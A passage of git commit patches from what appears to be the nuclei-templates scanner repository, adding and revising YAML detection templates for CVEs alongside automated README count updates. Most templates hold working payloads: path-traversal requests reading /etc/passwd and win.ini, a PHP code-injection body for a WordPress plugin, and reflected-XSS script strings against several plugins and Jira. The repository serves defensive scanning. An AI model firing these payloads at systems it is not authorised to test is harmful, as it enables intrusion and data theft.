"{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 From 134031c9aa06bbd3b26de0e16cba1c1527dad1e2 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 18:56:28 +0700 Subject: [PATCH 0717/4083] Update and rename cves/2020/CVE-2020-14461.yaml to cves/2018/CVE-2018-12031.yaml --- cves/{2020/CVE-2020-14461.yaml => 2018/CVE-2018-12031.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename cves/{2020/CVE-2020-14461.yaml => 2018/CVE-2018-12031.yaml} (86%) diff --git a/cves/2020/CVE-2020-14461.yaml b/cves/2018/CVE-2018-12031.yaml similarity index 86% rename from cves/2020/CVE-2020-14461.yaml rename to cves/2018/CVE-2018-12031.yaml index 748517d9db..234cdfb650 100644 --- a/cves/2020/CVE-2020-14461.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -1,4 +1,4 @@ -id: CVE-2020-14461 +id: CVE-2018-12031 info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal @@ -6,9 +6,9 @@ info: severity: high reference: | - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - - https://nvd.nist.gov/vuln/detail/CVE-2020-14461 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - https://www.exploit-db.com/exploits/48614 - tags: cve,cve2020,lfi + tags: cve,cve2018,lfi requests: - method: GET From 049d63066580360ed4c803fc7b153a6cbc2798b6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 11:57:56 +0000 Subject: [PATCH 0718/4083] Auto Update README [Fri Jul 16 11:57:56 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7663833b39..01cd40a7af 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 440 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 440 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1564 files**. +**128 directories, 1565 files**. From f4f05394e1b55aa02f76b4d009b1978a6007e6de Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:30:35 +0530 Subject: [PATCH 0719/4083] Update CVE-2020-35713.yaml --- cves/2020/CVE-2020-35713.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml index 7e3e77e0b3..d65d7e96c6 100644 --- a/cves/2020/CVE-2020-35713.yaml +++ b/cves/2020/CVE-2020-35713.yaml @@ -6,7 +6,7 @@ info: severity: critical reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. - tags: cve,cve2020,linksys,rce,oob + tags: cve,cve2020,linksys,rce,oob,router requests: - raw: From 7a1f0e6f07b644e711ee8b4caebfe1dba23fbe6b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:02:47 +0000 Subject: [PATCH 0720/4083] Auto Update README [Fri Jul 16 12:02:47 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 01cd40a7af..901734b061 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 440 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 441 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1565 files**. +**128 directories, 1566 files**. From 4238febae30396e470911768bd7dc1b984c4c9ed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:33:02 +0530 Subject: [PATCH 0721/4083] Update CVE-2018-12031.yaml --- cves/2018/CVE-2018-12031.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 234cdfb650..783f92a2eb 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -4,6 +4,7 @@ info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal author: daffainfo severity: high + description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. reference: | - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 From 0f923915c9554b49da1c1cc6851fa0b6094a8f30 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:04:11 +0000 Subject: [PATCH 0722/4083] Auto Update README [Fri Jul 16 12:04:11 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 901734b061..37376e9821 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 441 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 442 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1566 files**. +**128 directories, 1567 files**. From 110a989ff1559476601a1857c63fc261ed9c56ac Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:36:12 +0530 Subject: [PATCH 0723/4083] Update CVE-2018-12031.yaml --- cves/2018/CVE-2018-12031.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 783f92a2eb..264af49d7a 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -15,12 +15,15 @@ requests: - method: GET path: - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini matchers-condition: and matchers: - type: regex regex: - "root:[0*]:0:0" + - "\\[(font|extension|file)s\\]" + condition: or part: body - type: status status: From 304ab07b28b03afd1415fdce40612517cacd67e3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:42:00 +0530 Subject: [PATCH 0724/4083] Update CVE-2018-12031.yaml --- cves/2018/CVE-2018-12031.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 264af49d7a..0fc4b182f1 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -15,7 +15,7 @@ requests: - method: GET path: - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini" matchers-condition: and matchers: From 9ab9617b9575b64a0b0cfdc238fcbecaccf41c3a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:42:41 +0530 Subject: [PATCH 0725/4083] Update CVE-2019-16525.yaml --- cves/2019/CVE-2019-16525.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml index 23b3cdac75..3ff0907f88 100644 --- a/cves/2019/CVE-2019-16525.yaml +++ b/cves/2019/CVE-2019-16525.yaml @@ -4,6 +4,7 @@ info: name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525 tags: cve,cve2019,wordpress,xss,wp-plugin From f527e790e8892bf613fd1313a4d20d6182da0e14 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:14:28 +0000 Subject: [PATCH 0726/4083] Auto Update README [Fri Jul 16 12:14:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 37376e9821..2f4963bdbf 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 442 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 443 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1567 files**. +**128 directories, 1568 files**. From 429bb01311ea967964cf2920178ac05cc3cd641a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:46:33 +0530 Subject: [PATCH 0727/4083] Update CVE-2016-10960.yaml --- cves/2016/CVE-2016-10960.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index 2894158ab8..eeea3b13d7 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml @@ -15,13 +15,13 @@ requests: - method: POST path: - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" - body: 'wsecure_action=update&publish=";} echo "Hello, world."; class WSecureConfig2 {var $test="' + body: 'wsecure_action=update&publish=";} echo "Hello, world CVE-2016-10960."; class WSecureConfig2 {var $test="' matchers-condition: and matchers: - type: word words: - - "Hello, world." + - "Hello, world CVE-2016-10960." condition: and - type: status status: From f857247e84ec15b720132304d00182e14ad56fa9 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 19:17:49 +0700 Subject: [PATCH 0728/4083] Create CVE-2019-20085.yaml --- cves/2019/CVE-2019-20085.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2019/CVE-2019-20085.yaml diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml new file mode 100644 index 0000000000..3e678c02f3 --- /dev/null +++ b/cves/2019/CVE-2019-20085.yaml @@ -0,0 +1,25 @@ +id: CVE-2019-20085 + +info: + name: TVT NVMS 1000 - Directory Traversal + author: daffainfo + severity: high + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 + - https://www.exploit-db.com/exploits/48311 + tags: cve,cve2019,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini" + + matchers-condition: and + matchers: + - type: regex + regex: + - "\\[(font|extension|file)s\\]" + part: body + - type: status + status: + - 200 From eaba7dc5defcf9fbc6db5818c8c53aa4e121f6ad Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:54:37 +0530 Subject: [PATCH 0729/4083] Update CVE-2016-10960.yaml --- cves/2016/CVE-2016-10960.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index eeea3b13d7..68f7e2616c 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml @@ -15,14 +15,15 @@ requests: - method: POST path: - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" - body: 'wsecure_action=update&publish=";} echo "Hello, world CVE-2016-10960."; class WSecureConfig2 {var $test="' + body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="' matchers-condition: and matchers: - type: word words: - - "Hello, world CVE-2016-10960." + - "Nuclei: CVE-2016-10960" condition: and + part: header - type: status status: - 200 From 17402e9f64ea1ed0754a3da5c267264ad56fbcd5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:27:47 +0000 Subject: [PATCH 0730/4083] Auto Update README [Fri Jul 16 12:27:47 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2f4963bdbf..cb2a5b5166 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 443 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 444 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1568 files**. +**128 directories, 1569 files**. From 379345fc051689530a728cd11e694f83245e43ff Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:57:49 +0530 Subject: [PATCH 0731/4083] Update CVE-2019-20085.yaml --- cves/2019/CVE-2019-20085.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml index 3e678c02f3..8d5916a7ae 100644 --- a/cves/2019/CVE-2019-20085.yaml +++ b/cves/2019/CVE-2019-20085.yaml @@ -1,7 +1,7 @@ id: CVE-2019-20085 info: - name: TVT NVMS 1000 - Directory Traversal + name: TVT NVMS 1000 - Directory Traversal author: daffainfo severity: high reference: | From 829507fd1e8cb18d06b9e9619aacaf69db1b1169 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:58:51 +0530 Subject: [PATCH 0732/4083] Update CVE-2019-20085.yaml --- cves/2019/CVE-2019-20085.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml index 8d5916a7ae..1c31973d6b 100644 --- a/cves/2019/CVE-2019-20085.yaml +++ b/cves/2019/CVE-2019-20085.yaml @@ -4,10 +4,11 @@ info: name: TVT NVMS 1000 - Directory Traversal author: daffainfo severity: high + description: TVT NVMS-1000 devices allow GET /.. Directory Traversal reference: | - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 - https://www.exploit-db.com/exploits/48311 - tags: cve,cve2019,iot + tags: cve,cve2019,iot,lfi requests: - method: GET From 63ce91ad492df5a8cacff65d0a14f7c9e2f46cb7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:30:07 +0000 Subject: [PATCH 0733/4083] Auto Update README [Fri Jul 16 12:30:07 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index cb2a5b5166..7ea0b271ae 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 444 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 445 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1569 files**. +**128 directories, 1570 files**. From ba827f37c016c214440d62554fc0e234cd58a947 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:30:42 +0000 Subject: [PATCH 0734/4083] Auto Update README [Fri Jul 16 12:30:42 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7ea0b271ae..a1b212b721 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 445 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 446 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1570 files**. +**128 directories, 1571 files**. From 0efece2e2b32c2eac5f1fc884c303adb95e30529 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:35:28 +0000 Subject: [PATCH 0735/4083] Auto Update README [Fri Jul 16 12:35:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a1b212b721..09ff3b9208 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 446 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 449 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1571 files**. +**128 directories, 1575 files**. From 0b9c6a35209f7c7613d5130ee6d123403aa1ad72 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 20:43:22 +0700 Subject: [PATCH 0736/4083] Create CVE-2016-1000126.yaml --- cves/2016/CVE-2016-1000126.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000126.yaml diff --git a/cves/2016/CVE-2016-1000126.yaml b/cves/2016/CVE-2016-1000126.yaml new file mode 100644 index 0000000000..9d1325cd3d --- /dev/null +++ b/cves/2016/CVE-2016-1000126.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000126 + +info: + name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 72de5ba106d1fc7e85f3c89121189db168de09a7 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 20:46:42 +0700 Subject: [PATCH 0737/4083] Create CVE-2016-1000127.yaml --- cves/2016/CVE-2016-1000127.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000127.yaml diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml new file mode 100644 index 0000000000..9539d37287 --- /dev/null +++ b/cves/2016/CVE-2016-1000127.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000127 + +info: + name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 60c60f89558dc31a88718b409701e01d8a9e5cef Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:29:30 +0700 Subject: [PATCH 0738/4083] Create CVE-2010-4231.yaml --- cves/2010/CVE-2010-4231.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2010/CVE-2010-4231.yaml diff --git a/cves/2010/CVE-2010-4231.yaml b/cves/2010/CVE-2010-4231.yaml new file mode 100644 index 0000000000..fc754ae86b --- /dev/null +++ b/cves/2010/CVE-2010-4231.yaml @@ -0,0 +1,23 @@ +id: CVE-2010-4231 + +info: + name: Camtron CMNC-200 IP Camera - Directory Traversal + author: daffainfo + severity: high + reference: https://www.exploit-db.com/exploits/15505 + tags: cve,cve2010,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From b2c5fd9f0ac4981fa7e1a1d2aaba255aea96dd72 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:32:16 +0700 Subject: [PATCH 0739/4083] Create CVE-2010-2307.yaml --- cves/2010/CVE-2010-2307.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2010/CVE-2010-2307.yaml diff --git a/cves/2010/CVE-2010-2307.yaml b/cves/2010/CVE-2010-2307.yaml new file mode 100644 index 0000000000..392152269e --- /dev/null +++ b/cves/2010/CVE-2010-2307.yaml @@ -0,0 +1,23 @@ +id: CVE-2010-4231 + +info: + name: Motorola SBV6120E SURFboard Digital Voice Modem - Directory Traversal + author: daffainfo + severity: high + reference: https://www.securityfocus.com/bid/40550/info + tags: cve,cve2010,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 9756a893f015473cd36bec53062746cfa31c696c Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 16 Jul 2021 12:34:42 -0500 Subject: [PATCH 0740/4083] Create CVE-2007-0885.yaml --- cves/2007/CVE-2007-0885.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2007/CVE-2007-0885.yaml diff --git a/cves/2007/CVE-2007-0885.yaml b/cves/2007/CVE-2007-0885.yaml new file mode 100644 index 0000000000..9554822c3a --- /dev/null +++ b/cves/2007/CVE-2007-0885.yaml @@ -0,0 +1,26 @@ +id: CVE-2007-0885 + +info: + name: Rainbow.Zen Jira XSS + description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. + reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded + author: geeknik + severity: medium + tags: cve,cve2007,jira,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/jira/secure/BrowseProject.jspa?id=\">" + + matchers-condition: and + matchers: + - type: word + words: + - "\">" + - type: status + status: + - 200 + - type: word + part: header + - "text/html" From 4eb74ebcaed8172dd1e4bbece2254eeb63811482 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:38:35 +0700 Subject: [PATCH 0741/4083] Update CVE-2010-2307.yaml --- cves/2010/CVE-2010-2307.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2010/CVE-2010-2307.yaml b/cves/2010/CVE-2010-2307.yaml index 392152269e..e841195a11 100644 --- a/cves/2010/CVE-2010-2307.yaml +++ b/cves/2010/CVE-2010-2307.yaml @@ -1,7 +1,7 @@ -id: CVE-2010-4231 +id: CVE-2010-2307 info: - name: Motorola SBV6120E SURFboard Digital Voice Modem - Directory Traversal + name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal author: daffainfo severity: high reference: https://www.securityfocus.com/bid/40550/info From 141993dafd28434188a14f5c4ebcac79d17e95d3 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:40:24 +0700 Subject: [PATCH 0742/4083] Create CVE-2009-1558.yaml --- cves/2009/CVE-2009-1558.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2009/CVE-2009-1558.yaml diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml new file mode 100644 index 0000000000..f5f348890c --- /dev/null +++ b/cves/2009/CVE-2009-1558.yaml @@ -0,0 +1,23 @@ +id: CVE-2009-1558 + +info: + name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal + author: daffainfo + severity: high + reference: https://www.exploit-db.com/exploits/32954 + tags: cve,cve2009,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 3830a7805a11097ac4586969156a178466028c6c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:49:06 +0700 Subject: [PATCH 0743/4083] Create CVE-2016-1000128.yaml --- cves/2016/CVE-2016-1000128.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000128.yaml diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml new file mode 100644 index 0000000000..83fc34ed8d --- /dev/null +++ b/cves/2016/CVE-2016-1000128.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000128 + +info: + name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 6ee439eda2b02d2ae7393198c15ac0b8c81e568c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:50:57 +0700 Subject: [PATCH 0744/4083] Create CVE-2016-1000129.yaml --- cves/2016/CVE-2016-1000129.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000129.yaml diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml new file mode 100644 index 0000000000..72991376fc --- /dev/null +++ b/cves/2016/CVE-2016-1000129.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000129 + +info: + name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 